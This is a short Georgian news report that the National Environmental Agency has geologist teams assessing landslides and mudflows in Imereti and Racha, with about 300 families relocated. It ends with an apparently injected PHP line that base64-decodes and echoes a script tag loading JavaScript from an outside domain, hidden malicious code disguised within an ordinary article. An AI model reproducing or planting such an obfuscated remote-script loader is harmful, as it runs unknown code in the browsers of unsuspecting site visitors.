celsiusi
ავერსი საქკაბელი

 გარემოს ეროვნული სააგენტოს ინფორმაციით, გეოლოგების სამი ჯგუფი საქართველოს ტერიტორიაზე განვითარებული სტიქიის ზონებში რჩება და მოვლენების შესწავლას ადგილზე აგრძელებს.

სააგენტოს ცნობით, მათ შორის ორი ჯგუფი იმყოფება იმერეთში, ხოლო ერთი ჯგუფი – რაჭის ტერიტორიაზე.

„იმერეთში დაფიქსირებულია მეწყერები, ხოლო რაჭაში – მეწყრული და ღვარცოფული პროცესები. 6-დან 12 თებერვლამდე გეოლოგების ჯგუფებმა შეაფასეს 541 ოჯახი (მათ შორის, აჭარის რეგიონში), გატარდა საპრევენციო ზომები და მდგრად ადგილზე გადაყვანას დაექვემდებარა 300-მდე ოჯახი. სააგენტოს სპეციალისტების მიერ შემდგომი დამცავი და სტიქიის საპრევენციო ღონისძიებების გასატარებლად გაიცა შესაბამისი რეკომენდაციები.

აღსანიშნავია, ბოლო დღეებში ქვეყნის მასშტაბით ინტენსიურად მიმდინარე თოვლის დნობის პროცესს თან დაერთო უხვი ატმოსფერული ნალექების მოსვლა წვიმის სახით, რომელმაც, თავის მხრივ, გამოიწვია ბუნებრივად ისედაც დაძაბულ ტერიტორიებზე სხვადასხვა სტიქიური პროცესის (მეწყერი, ღვარცოფი, წყალდიდობა, წყალმოვარდნა, თოვლის ზვავი) ჩასახვა-გააქტიურება“, – აღნიშნულია გარემოს ეროვნული სააგენტოს მიერ გავრცელებულ ინფორმაციაში.

222
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");